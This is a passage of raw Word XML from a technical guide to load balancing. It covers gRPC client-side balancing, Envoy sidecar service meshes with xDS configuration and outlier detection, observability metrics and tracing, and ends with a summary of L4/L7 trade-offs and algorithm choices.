          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every client must implement load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> All service clients (Java, Python, Go, Node.js) need the same logic. Polyglot microservice environments require the same logic implemented in multiple languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAFC06" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service discovery complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Clients need access to service registry and must handle staleness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179310C1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>No global view:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each client's load balancing decision is local. Two clients independently might both choose the same backend, creating a hotspot that neither would have chosen with global information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF673C9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC's built-in client-side load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> gRPC has a built-in load balancing framework. The gRPC client resolves the target service name to multiple backend addresses (via DNS, xDS, or custom resolver). The load balancing policy (round robin, weighted round robin, P2C) distributes calls across the resolved addresses. gRPC connections are long-lived (HTTP/2 multiplexing) — the load balancing occurs at the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPC level</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, not the connection level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4D54A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Mesh — The Sidecar Proxy Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163747AF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Service mesh moves client-side load balancing into a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sidecar proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (Envoy) that runs alongside each service instance. The service doesn't implement load balancing — the sidecar does it transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5C935" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic interception mechanism:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Kubernetes injects an </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>init container</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> that adds iptables rules to the pod before the service container starts. These rules redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all outbound TCP traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> to the Envoy sidecar's port (15001). When the service makes a connection to http://backend-service:8080, the OS's routing redirects the connection to 127.0.0.1:15001 (the local Envoy). Envoy determines the intended destination (from the original destination IP, preserved by iptables), applies load balancing, and proxies to the actual backend pod. The service is completely unaware of the interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC4DEC7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xDS control plane — dynamic configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Envoy doesn't have static configuration of backend lists and load balancing rules. Instead, it maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streaming gRPC connections</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> to the control plane (Istiod in Istio) and receives dynamic updates via xDS APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA3610B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDS (Endpoint Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> "Here are the current healthy endpoints for payment-service: [10.0.1.5:8080, 10.0.1.6:8080, 10.0.1.7:8080]. Pod 10.0.1.4 just failed its readiness probe and is removed."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEBA6F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDS (Cluster Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> "The payment-service cluster should use P2C load balancing with outlier detection."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3338E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS (Route Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> "Route requests with header X-Version: v2 to the payment-service-v2 cluster."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D928C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDS (Listener Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> "Listen on port 15001 for outbound traffic."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BD508" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>Updates propagate from control plane to all Envoy sidecars in </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> without any proxy restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D487B63" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outlier Detection (Passive Health Checking):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> In addition to active health checks (probing backends periodically), Envoy performs </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>passive health checking</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — monitoring actual request outcomes in real time. If a backend returns 5 consecutive 5xx errors, or has response latency exceeding 3× the cluster average, Envoy </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ejects</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> it from the load balancing pool for a penalty period. After the penalty period, it re-admits the backend with limited traffic to verify recovery (similar to a circuit breaker half-open state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B23299" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The key: passive health checking reacts to </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actual user-facing failures</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub-second detection</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. Active health checks detect failures in seconds to minutes. For a high-traffic API, sub-second detection means thousands fewer failed requests compared to minute-level detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BE2CF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="4B024AC3">
          <v:rect id="_x0000_i2542" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D490720" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Load Balancing Observability — What to Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A32DFE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Metrics That Actually Matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70283B2B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Upstream response time distribution (per backend):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Track p50, p95, p99 response time </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>per backend instance</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, not just overall. A rising p99 for one specific backend while others are normal indicates a problem with that instance — the LB should detect this and reduce traffic to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272CEEA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection queue depth:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> How many incoming connections are waiting to be accepted. A growing queue means the LB is at connection acceptance capacity. This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leading indicator</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> of LB overload — alert before the queue fills and clients start experiencing connection timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978CF3C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend error rates:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Track HTTP 4xx and 5xx rates per backend. Spikes in 5xx for a specific backend indicate application-level issues on that instance. The LB's outlier detection should pick this up — verify that it does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2FDAC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active vs pending connections per backend:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> active_connections = requests currently being processed. pending_connections = requests waiting in the backend's queue (if the backend is busy). Elevated pending connections indicate a backend is overloaded — requests are queuing at the backend rather than being served immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA9742" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health check success rate:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Track health check outcomes per backend. A backend that's flapping (intermittently passing/failing) should be investigated — it may be on the edge of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4449AEC5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Load balancing distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> What fraction of traffic is each backend receiving? In a cluster of 10 backends, each should receive ~10% ± a few percent. Significant deviation indicates the load balancing algorithm is not distributing evenly — possibly due to sticky sessions, skewed hashing, or a misconfigured weight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C295B4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Tracing Through the Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F607F0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The LB should propagate </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trace context headers</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (W3C TraceContext: traceparent, tracestate) from client requests to backends. This allows distributed tracing systems to correlate client requests with backend processing — you can see the full request path through the LB into the backend service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B4B18" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LB-generated spans:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB creates a span for each request it processes, recording:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9CA772" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Time the request arrived.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD07E14" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Time the backend was selected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281B1E9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Time the backend connection was established (or retrieved from pool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493202B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Time the response was received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45FA72" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Time the response was sent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5C5BF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>These timestamps expose LB-introduced latency — connection pool contention, backend selection delay, health check failures causing retries. Without LB-level tracing, this latency is invisible — it appears as "backend latency" even though the backend itself is fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A02487" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="31FAF7FA">
          <v:rect id="_x0000_i2543" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6175A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA960A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAB5E7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Load Balancer = Traffic Distribution Engine + Health Manager + Observability Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E14892" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="5AA9C102" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  L4 (Transport):  Kernel-space packet forwarding, millions of PPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E5DDE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Routing unit: TCP flow (connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843D5F4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Visibility: IP + port only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D73D659" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Speed: Microseconds per packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2CC9B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Use: High-throughput, latency-sensitive, simple routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A01999" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="6902BA67" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  L7 (Application): User-space proxy, TLS termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5E79F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Routing unit: HTTP request (sub-connection granularity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65838F4F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Visibility: Full HTTP headers, URL, cookies, body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031DADA8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Speed: Milliseconds per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BC559" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">                   Use: Content-based routing, microservices, observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EEAD79" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="0D819FAD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Algorithm Selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D76379" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Homogeneous backends + uniform requests        → Round Robin (simplest, fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220FF891" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Heterogeneous request durations               → Least Connections or P2C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFA3D2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Large backend pools, high concurrency         → Power of Two Choices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCA4A1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Stateful backends, cache locality required    → Consistent Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22447933" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Variable backend capacities                   → Weighted algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA62A8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Real-time backend load signals available      → Resource-aware routing (EWMA latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7ABA9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="2DE14A10" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Health Checking Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E30F38" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  L4 TCP probe        → Process is running, port is open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCBB528" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  L7 HTTP probe       → Application is responsive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F182E5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
